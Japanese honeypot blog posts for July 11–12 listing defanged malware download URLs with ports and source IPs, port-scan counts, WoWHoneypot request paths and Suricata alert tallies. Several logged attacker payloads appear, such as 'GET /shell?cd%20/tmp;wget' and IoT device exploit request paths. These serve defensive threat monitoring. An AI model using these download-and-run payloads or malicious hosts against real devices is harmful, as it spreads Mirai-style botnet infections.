6378 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 220[.]194[.]237[.]43
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 178[.]62[.]112[.]14 105[.]156[.]57[.]15
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
37215 hxxp://195[.]201[.]235[.]173 174[.]138[.]5[.]118
8161 lsd[.]systemten[.]org 160[.]16[.]50[.]150
8161 lsd[.]systemten[.]org 160[.]16[.]79[.]209
37215 174[.]128[.]226[.]101 107[.]173[.]222[.]169
37215 199[.]38[.]245[.]220 68[.]195[.]29[.]77
60001 hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 185[.]172[.]110[.]226
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
801 hxxp://fid[.]hognoob[.]se/download[.]exe 196[.]229[.]36[.]164
5500 hxxp:/\/178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
5555 hxxp://185[.]244[.]25[.]241/k 94[.]192[.]84[.]33
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/mpsl 104[.]251[.]122[.]37
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 106[.]75[.]6[.]203
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 58[.]82[.]212[.]148
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 221[.]182[.]115[.]133
8161 lsd[.]systemten[.]org 160[.]16[.]134[.]40
8161 lsd[.]systemten[.]org 160[.]16[.]202[.]252
8161 lsd[.]systemten[.]org 160[.]16[.]204[.]135
8161 lsd[.]systemten[.]org 160[.]16[.]91[.]228
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 223[.]203[.]201[.]254
37215 178[.]62[.]114[.]122 79[.]24[.]106[.]146
37215 206[.]189[.]17[.]158 46[.]101[.]255[.]19
37215 206[.]189[.]170[.]165 212[.]19[.]119[.]8
37215 89[.]46[.]223[.]195 162[.]252[.]200[.]7
37215 89[.]46[.]223[.]195 79[.]53[.]81[.]185
52869 hxxp://168[.]235[.]89[.]216/IDJAPbins[.]sh 134[.]209[.]114[.]98
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]153[.]180[.]246
60001 hxxp:/\/185[.]244[.]25[.]171/bins/Jaws[.]sh 109[.]238[.]12[.]68
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 219[.]77[.]18[.]91
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
443 hxxp://fid[.]hognoob[.]se/download[.]exe 182[.]76[.]76[.]206
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
800 hxxp://fid[.]hognoob[.]se/download[.]exe 197[.]26[.]162[.]168
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]81[.]87
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
801 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]153[.]210[.]53
5555 hxxp://134[.]209[.]183[.]3/z[.]sh 134[.]209[.]18[.]235
5555 hxxp://185[.]244[.]25[.]24/k 151[.]29[.]5[.]219
5555 hxxp://185[.]244[.]25[.]241/k 101[.]51[.]5[.]136
5555 hxxp://185[.]244[.]25[.]241/k 103[.]3[.]224[.]190
5555 hxxp://185[.]244[.]25[.]241/k 104[.]205[.]11[.]120
5555 hxxp://185[.]244[.]25[.]241/k 109[.]116[.]204[.]63
5555 hxxp://185[.]244[.]25[.]241/k 112[.]137[.]35[.]5
5555 hxxp://185[.]244[.]25[.]241/k 116[.]251[.]1[.]72
5555 hxxp://185[.]244[.]25[.]241/k 122[.]138[.]100[.]6
5555 hxxp://185[.]244[.]25[.]241/k 130[.]0[.]189[.]117
5555 hxxp://185[.]244[.]25[.]241/k 151[.]63[.]25[.]250
5555 hxxp://185[.]244[.]25[.]241/k 162[.]40[.]137[.]97
5555 hxxp://185[.]244[.]25[.]241/k 171[.]13[.]150[.]58
5555 hxxp://185[.]244[.]25[.]241/k 171[.]234[.]115[.]32
5555 hxxp://185[.]244[.]25[.]241/k 174[.]49[.]67[.]132
5555 hxxp://185[.]244[.]25[.]241/k 175[.]139[.]77[.]69
5555 hxxp://185[.]244[.]25[.]241/k 176[.]223[.]72[.]122
5555 hxxp://185[.]244[.]25[.]241/k 177[.]105[.]116[.]22
5555 hxxp://185[.]244[.]25[.]241/k 177[.]71[.]59[.]193
5555 hxxp://185[.]244[.]25[.]241/k 180[.]130[.]153[.]49
5555 hxxp://185[.]244[.]25[.]241/k 182[.]253[.]65[.]183
5555 hxxp://185[.]244[.]25[.]241/k 188[.]217[.]185[.]71
5555 hxxp://185[.]244[.]25[.]241/k 188[.]49[.]46[.]158
5555 hxxp://185[.]244[.]25[.]241/k 190[.]12[.]177[.]88
5555 hxxp://185[.]244[.]25[.]241/k 191[.]162[.]43[.]35
5555 hxxp://185[.]244[.]25[.]241/k 197[.]227[.]172[.]131
5555 hxxp://185[.]244[.]25[.]241/k 27[.]76[.]50[.]21
5555 hxxp://185[.]244[.]25[.]241/k 37[.]135[.]73[.]41
5555 hxxp://185[.]244[.]25[.]241/k 37[.]182[.]29[.]57
5555 hxxp://185[.]244[.]25[.]241/k 39[.]77[.]231[.]147
5555 hxxp://185[.]244[.]25[.]241/k 42[.]2[.]209[.]84
5555 hxxp://185[.]244[.]25[.]241/k 42[.]200[.]116[.]26
5555 hxxp://185[.]244[.]25[.]241/k 42[.]52[.]170[.]23
5555 hxxp://185[.]244[.]25[.]241/k 46[.]152[.]121[.]109
5555 hxxp://185[.]244[.]25[.]241/k 70[.]31[.]239[.]253
5555 hxxp://185[.]244[.]25[.]241/k 73[.]89[.]44[.]194
5555 hxxp://185[.]244[.]25[.]241/k 77[.]76[.]180[.]169
5555 hxxp://185[.]244[.]25[.]241/k 78[.]101[.]87[.]97
5555 hxxp://185[.]244[.]25[.]241/k 79[.]111[.]33[.]39
5555 hxxp://185[.]244[.]25[.]241/k 92[.]98[.]237[.]36
5555 hxxp://185[.]70[.]105[.]35/teqbins[.]sh 61[.]216[.]81[.]44
5555 hxxp://185[.]99[.]254[.]29/bins/arm7 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://185[.]99[.]254[.]29/bins/x86 104[.]251[.]122[.]37
5555 hxxp://209[.]97[.]163[.]186/c 112[.]170[.]69[.]163
5555 hxxp://68[.]183[.]39[.]48/icy[.]sh 182[.]254[.]168[.]229
5555 hxxp://87[.]120[.]254[.]184/curl1 185[.]164[.]72[.]227
5555 hxxp://87[.]120[.]254[.]184/curl1 80[.]82[.]70[.]43
6379 hxxp://w[.]lazer-n[.]com:43768/lll[.]sh 119[.]253[.]84[.]102
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 123[.]157[.]252[.]90
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 129[.]213[.]50[.]59
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]107[.]73[.]221
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 177[.]191[.]190[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 183[.]89[.]159[.]107
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]5[.]245[.]144
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 191[.]55[.]142[.]52
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 213[.]150[.]178[.]174
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 221[.]230[.]132[.]58
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 36[.]91[.]102[.]138
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
7001 hxxp://fid[.]hognoob[.]se/download[.]exe 5[.]1[.]38[.]129
8000 hxxp://209[.]141[.]40[.]213/avtech 209[.]52[.]149[.]41
8000 hxxp://31[.]13[.]195[.]251/ECHO/ECHOBOT[.]mips 159[.]203[.]18[.]21
8060 hxxp://fid[.]hognoob[.]se/download[.]exe 165[.]56[.]0[.]30
8080 hxxp://134[.]209[.]183[.]3/akbins/mpsl[.]akira[.]ak 134[.]209[.]28[.]200
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 109[.]124[.]148[.]167
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 121[.]179[.]46[.]82
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 124[.]133[.]108[.]34
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 148[.]63[.]18[.]12
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 182[.]34[.]123[.]90
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 213[.]192[.]56[.]195
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 222[.]218[.]220[.]101
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 46[.]105[.]209[.]48
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 66[.]168[.]88[.]53
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 83[.]29[.]229[.]22
8080 hxxp://ardp[.]hldns[.]ru/loligang[.]mpsl 93[.]100[.]110[.]69
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://fid[.]hognoob[.]se/download[.]exe 143[.]0[.]151[.]173
8080 hxxp://hulo[.]r00ts[.]online/[.]config/Lrep 122[.]116[.]216[.]224
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 118[.]232[.]136[.]122
8080 hxxp://hulo[.]r00ts[.]online/FleX/Lrep 88[.]249[.]249[.]27
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 120[.]236[.]87[.]152
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 41[.]226[.]251[.]178
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8088 hxxp://fid[.]hognoob[.]se/download[.]exe 85[.]105[.]111[.]237
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
8111 hxxp://fid[.]hognoob[.]se/download[.]exe 40[.]68[.]131[.]225
9200 hxxp://185[.]181[.]10[.]234/E5DB0E07C3D7BE80V520/init[.]sh 3[.]213[.]101[.]190
9200 hxxp://216[.]176[.]179[.]106:9090/26006\ 202[.]109[.]143[.]110
9888 hxxp://fid[.]hognoob[.]se/download[.]exe 185[.]48[.]149[.]115
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 218[.]62[.]29[.]165
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
9999 hxxp://fid[.]hognoob[.]se/download[.]exe 43[.]254[.]125[.]41
37215 103[.]83[.]157[.]41 142[.]93[.]113[.]113
37215 104[.]248[.]93[.]159 68[.]183[.]151[.]62
37215 157[.]230[.]173[.]232 145[.]239[.]168[.]176
37215 157[.]230[.]173[.]232 37[.]6[.]230[.]115
37215 157[.]230[.]173[.]232 79[.]107[.]238[.]19
37215 157[.]230[.]173[.]232 79[.]107[.]244[.]144
37215 159[.]203[.]21[.]20 77[.]42[.]104[.]114
37215 159[.]65[.]240[.]150 88[.]36[.]135[.]138
37215 159[.]89[.]38[.]57 106[.]13[.]52[.]123
37215 178[.]62[.]112[.]14 60[.]8[.]213[.]120
37215 178[.]62[.]114[.]122 151[.]30[.]69[.]79
37215 178[.]62[.]114[.]122 199[.]182[.]137[.]148
37215 178[.]62[.]114[.]122 212[.]210[.]31[.]47
37215 178[.]62[.]114[.]122 37[.]130[.]113[.]38
37215 178[.]62[.]114[.]122 79[.]12[.]199[.]206
37215 185[.]244[.]25[.]235 149[.]129[.]132[.]231
37215 185[.]244[.]25[.]235 34[.]85[.]97[.]138
37215 185[.]244[.]25[.]235 47[.]92[.]54[.]63
37215 206[.]189[.]170[.]165 151[.]24[.]171[.]42
37215 206[.]189[.]170[.]165 151[.]30[.]33[.]254
37215 206[.]189[.]170[.]165 151[.]30[.]62[.]96
37215 206[.]189[.]170[.]165 151[.]32[.]113[.]220
37215 206[.]189[.]170[.]165 151[.]32[.]61[.]221
37215 206[.]189[.]170[.]165 151[.]52[.]39[.]144
37215 206[.]189[.]170[.]165 151[.]64[.]117[.]217
37215 206[.]189[.]170[.]165 212[.]19[.]112[.]212
37215 206[.]189[.]170[.]165 212[.]19[.]116[.]205
37215 206[.]189[.]170[.]165 79[.]23[.]98[.]90
37215 206[.]189[.]170[.]165 79[.]47[.]184[.]216
37215 206[.]189[.]170[.]165 79[.]52[.]2[.]81
37215 209[.]141[.]43[.]15 220[.]127[.]239[.]7
37215 209[.]97[.]136[.]57 85[.]134[.]12[.]144
37215 37[.]49[.]225[.]230 37[.]202[.]111[.]58
37215 37[.]49[.]225[.]230 37[.]202[.]127[.]16
37215 37[.]49[.]225[.]230 46[.]185[.]139[.]32
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 68[.]183[.]39[.]48 68[.]183[.]151[.]62
37215 89[.]190[.]159[.]189 151[.]40[.]20[.]117
37215 89[.]190[.]159[.]189 151[.]49[.]112[.]101
37215 89[.]190[.]159[.]189 152[.]171[.]67[.]142
37215 89[.]190[.]159[.]189 188[.]136[.]243[.]230
37215 89[.]190[.]159[.]189 79[.]46[.]88[.]134
37215 89[.]190[.]159[.]189 80[.]15[.]216[.]26
37215 89[.]34[.]26[.]202 174[.]138[.]0[.]191
37215 89[.]46[.]223[.]195 162[.]255[.]122[.]178
37215 hxxp://213[.]166[.]69[.]64 174[.]138[.]5[.]118
52869 hxxp://174[.]128[.]226[.]101/kr 185[.]101[.]105[.]192
52869 hxxp://185[.]142[.]236[.]205/wrgjwrgjwrg246356356356/hmips 188[.]166[.]48[.]241
52869 hxxp://213[.]166[.]69[.]64/akbins/mips[.]akirag 174[.]138[.]0[.]191
55555 ftp -r 185[.]172[.]110[.]246
60001 hxxp:/\/178[.]33[.]181[.]23/infect 167[.]86[.]77[.]222
60001 hxxp:/\/178[.]33[.]181[.]23/sh 167[.]86[.]77[.]222
60001 hxxp:/\/185[.]172[.]110[.]226/lmaoWTF/Jaws[.]sh 45[.]8[.]159[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 1[.]4[.]188[.]23
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 101[.]108[.]98[.]16
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 103[.]133[.]64[.]68
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 104[.]205[.]11[.]120
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 108[.]30[.]142[.]74
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 112[.]119[.]70[.]4
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 112[.]243[.]249[.]179
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 113[.]231[.]104[.]95
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 114[.]203[.]95[.]52
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 115[.]96[.]156[.]121
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 118[.]81[.]99[.]146
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 120[.]1[.]136[.]29
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 125[.]26[.]203[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 151[.]70[.]197[.]241
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 163[.]158[.]203[.]173
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 175[.]151[.]238[.]175
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 178[.]221[.]57[.]209
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 182[.]180[.]121[.]222
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 185[.]18[.]46[.]110
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 188[.]49[.]46[.]158
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 189[.]26[.]196[.]203
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 190[.]221[.]92[.]136
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 191[.]243[.]231[.]64
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 196[.]229[.]230[.]251
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 197[.]0[.]168[.]186
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 2[.]89[.]166[.]11
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 219[.]139[.]232[.]108
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 222[.]72[.]116[.]147
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 27[.]192[.]11[.]108
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 27[.]76[.]50[.]21
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 35[.]199[.]147[.]245
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 37[.]202[.]100[.]185
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 39[.]44[.]40[.]234
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 39[.]45[.]138[.]80
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 41[.]138[.]117[.]19
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 41[.]143[.]237[.]2
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 42[.]53[.]118[.]250
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 5[.]219[.]171[.]187
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 5[.]236[.]217[.]102
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 58[.]10[.]74[.]65
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 61[.]175[.]101[.]165
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 68[.]194[.]230[.]145
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 93[.]46[.]58[.]233
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 93[.]81[.]10[.]51
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 94[.]231[.]164[.]168
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]137[.]251[.]164
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]219[.]163[.]24
60001 hxxp:/\/185[.]244[.]25[.]241/b/arm7 95[.]249[.]151[.]66



以上となります。

 

【ハニーポット簡易分析】Honeypot簡易分析(327日目:7/12)

ハニーポット簡易分析】Honeypot簡易分析(327日目:7/12)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190713163247p:plain


<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4300 875
23 telnet 1397 161
2323 telnet 286 193
5900 vnc 286 -207
5353 Unknown 117 116
2222 unreg-ab2 78 50
6379 Unknown 56 45
3389 rdp 52 -91
5555 personal-agent 47 16
3306 mysql 46 -116


<新規マルウェアダウンロード>
malwaredowmload payload(例)
hxxp:/\/89[.]190[.]159[.]178/lovely GET /shell?cd%20/tmp;wget
hxxp:/\/x[.]autistichorse[.]club/bins/hhh[.]arm7 GET /shell?cd%20/tmp;wget
 

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713163725p:plain

<検知パス一覧>
path target CVE reference count
/ - - - 25
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 24
hxxp://110.249.212.46/testget Unauthorized Relay - - 10
/phpmyadmin/index.php phpMyAdmin - - 3
/DA88BAE3EDCA736B157C93CB40964A37.php Webshel     1
/dana-na/jam/querymanifest.cgi Unknown     1
/dd9a8afc0676f231e6439ecf489f8336.php   1
/index.php - - - 1
/phpMyAdmin/index.php phpMyAdmin - - 1
/robots.txt - - - 1
/web/cgi-bin/hi3510/param.cgi Zivif Web CVE-2017-17106 https://sec-owl.hatenablog.com/entry/2018/09/24/011848 1
hxxp://112.35.63.31:8088/index.php Unauthorized Relay - - 1

<新規検知パス一覧>
/DA88BAE3EDCA736B157C93CB40964A37.php
→Webshell
/dana-na/jam/querymanifest.cgi
→Unknown
/dd9a8afc0676f231e6439ecf489f8336.php
→Webshell
/phpMyAdmin/index.php
phpMyAdminの調査行為

マルウェアダウンロード>
なし

<テスト中ログ Suricata>
alert.category alert.signature count
Not Suspicious Traffic ET INFO Potentially unsafe SMBv1 protocol in use 1306
Generic Protocol Command Decode SURICATA IPv4 padding required 691
Potentially Bad Traffic GPL SCAN loopback traffic 691
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYN resend with different seq 275
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend with different ACK 259
Generic Protocol Command Decode SURICATA STREAM Packet with broken ack 224
Misc activity GPL ICMP_INFO Destination Unreachable Communication with Destination Host is Administratively Prohibited 130
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED invalid ack 124
Generic Protocol Command Decode SURICATA STREAM Packet with invalid ack 124
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend 103
Generic Protocol Command Decode SURICATA HTTP missing Host header 93
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYN resend different seq on SYN recv 85
Misc activity ET POLICY SSH session in progress on Unusual Port 74
Generic Protocol Command Decode SURICATA Applayer Wrong direction first Data 73
Misc activity ET POLICY SSH Client Banner Detected on Unusual Port 68
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK resend with different ack 65
Generic Protocol Command Decode SURICATA STREAM RST recv but no session 29
Generic Protocol Command Decode SURICATA Applayer Mismatch protocol both directions 17
Generic Protocol Command Decode SURICATA STREAM Packet with invalid timestamp 10
Attempted Administrator Privilege Gain ET EXPLOIT Linksys E-Series Device RCE Attempt Outbound 8
Generic Protocol Command Decode SURICATA TCPv4 invalid checksum 8
Generic Protocol Command Decode SURICATA TLS invalid record/traffic 8
Generic Protocol Command Decode SURICATA TLS invalid record type 6
Generic Protocol Command Decode SURICATA SMTP no server welcome message 5
Generic Protocol Command Decode SURICATA STREAM bad window update 4
Generic Protocol Command Decode SURICATA TLS error message encountered 4
Generic Protocol Command Decode SURICATA TLS handshake invalid length 4
Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction 3
Generic Protocol Command Decode SURICATA STREAM TIMEWAIT ACK with wrong seq 3
Generic Protocol Command Decode SURICATA STREAM 3way handshake wrong seq wrong ack 2
Generic Protocol Command Decode SURICATA STREAM excessive retransmissions 2
Generic Protocol Command Decode SURICATA TLS invalid handshake message 2
Potentially Bad Traffic ET POLICY Inbound RDP Connection with Minimal Security Protocol Requested 2
Executable Code was Detected ET SHELLCODE Adenau Shellcode 1
Generic Protocol Command Decode SURICATA HTTP unable to match response to request 1
Generic Protocol Command Decode SURICATA STREAM FIN out of window 1
Generic Protocol Command Decode SURICATA STREAM FIN recv but no session 1
Generic Protocol Command Decode SURICATA STREAM SYN resend 1
Generic Protocol Command Decode SURICATA UDPv4 invalid checksum 1
Misc activity ET CHAT IRC NICK command 1
Misc activity ET INFO Cisco Smart Install Protocol Observed 1
Potentially Bad Traffic GPL TFTP Get

以上となります。
 

【ハニーポット簡易分析】Honeypot簡易分析(326日目:7/11)

ハニーポット簡易分析】Honeypot簡易分析(326日目:7/11)となります。

◾️Honeytrap
※80ポートは除く
<国別検知数および検知数>

f:id:one-chick-sec:20190713161621p:plain

<ポート検知数(30日平均比)>
ポート番号 サービス 件数 件数差(30日平均)
445 smb 4001 575
23 telnet 1749 533
5900 vnc 611 73
11022 Unknown  233 232
2323 telnet 207 117
8080 proxy 161 129
3306 mysql 91 -76
3389 rdp 78 -75
175 vmnet 72 72
81 hosts2-ns 70 38
<新規マルウェアダウンロード>
malwaredowmload payload(例)
hxxp:/\/89[.]190[.]159[.]178/lovely GET /shell?cd%20/tmp;wget
hxxp://fbihere[.]web2tor[.]cf/love POST /UD/?9 HTTP/1.1
142[.]11[.]240[.]29 POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
hxxp://198[.]46[.]202[.]162/kr POST /picsdesc.xml HTTP/1.1
やはり、Mirai/Gafgyt系のマルウェアが多い傾向です。

◾️WoWHoneeypot
<国別検知数および検知数>

f:id:one-chick-sec:20190713162140p:plain


<検知パス一覧>

path

target CVE reference count
/admin/assets/js/views/login.js FreePBX - https://git.freepbx.org/projects/FREEPBX/repos/framework/browse/amp_conf/htdocs/admin/assets/js/views/login.js?at=bfb36fa7ac70c2e642257dbcd99a1799e19ea743 20
/ - - - 17
hxxp://110[.]249.212.46/testget Unauthorized Relay - - 8
/index.php - - - 3
/phpmyadmin/index.php phpMyAdmin - - 3
/robots.txt - - - 2
/MyAdmin/scripts/setup.php phpMyAdmin - - 1
/manager/html Tomcat - - 1
/myadmin/scripts/setup.php phpMyAdmin - - 1
/phpMyAdmin/scripts/setup.php phpMyAdmin - - 1
/phpmyadmin/scripts/setup.php phpMyAdmin - - 1
/pma/scripts/setup.php phpMyAdmin - - 1
/user/login.html Unknown - - 1
/w00tw00t.at.blackhats.romanian.anti-sec:) phpMyAdmin - - 1
<新規検知パス一覧>
/myadmin/scripts/setup.php
/phpMyAdmin/scripts/setup.php
/phpmyadmin/scripts/setup.php
/pma/scripts/setup.php
→いずれもphpMyadminの調査行為と思われます。

マルウェアダウンロード>
なし
 
<テスト中ログ(Suricata)>
alert.category alert.signature count
Generic Protocol Command Decode SURICATA STREAM Packet with broken ack 2366
Not Suspicious Traffic ET INFO Potentially unsafe SMBv1 protocol in use 1218
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK resend with different ack 1088
Generic Protocol Command Decode SURICATA IPv4 padding required 691
Potentially Bad Traffic GPL SCAN loopback traffic 691
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYN resend different seq on SYN recv 437
Generic Protocol Command Decode SURICATA HTTP missing Host header 190
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend with different ACK 150
Generic Protocol Command Decode SURICATA STREAM FIN recv but no session 143
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYN resend with different seq 136
Misc activity ET POLICY SSH Client Banner Detected on Unusual Port 106
Misc activity ET POLICY SSH session in progress on Unusual Port 104
Misc activity GPL ICMP_INFO Destination Unreachable Communication with Destination Host is Administratively Prohibited 97
Generic Protocol Command Decode SURICATA STREAM Packet with invalid timestamp 85
Generic Protocol Command Decode SURICATA STREAM RST recv but no session 75
Generic Protocol Command Decode SURICATA STREAM Packet with invalid ack 66
Generic Protocol Command Decode SURICATA ICMPv4 unknown code 64
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED invalid ack 64
Generic Protocol Command Decode SURICATA STREAM ESTABLISHED SYNACK resend 55
Generic Protocol Command Decode SURICATA Applayer Detect protocol only one direction 33
Generic Protocol Command Decode SURICATA TLS invalid record type 24
Generic Protocol Command Decode SURICATA TLS invalid record/traffic 24
Generic Protocol Command Decode SURICATA Applayer Mismatch protocol both directions 18
Generic Protocol Command Decode SURICATA TCPv4 invalid checksum 16
Generic Protocol Command Decode SURICATA zero length padN option 16
Generic Protocol Command Decode SURICATA STREAM FIN out of window 8
Generic Protocol Command Decode SURICATA STREAM TIMEWAIT ACK with wrong seq 8
Generic Protocol Command Decode SURICATA SMTP no server welcome message 7
Generic Protocol Command Decode SURICATA STREAM 3way handshake SYNACK with wrong ack 6
Potentially Bad Traffic ET POLICY Tunneled RDP msts Handshake 6
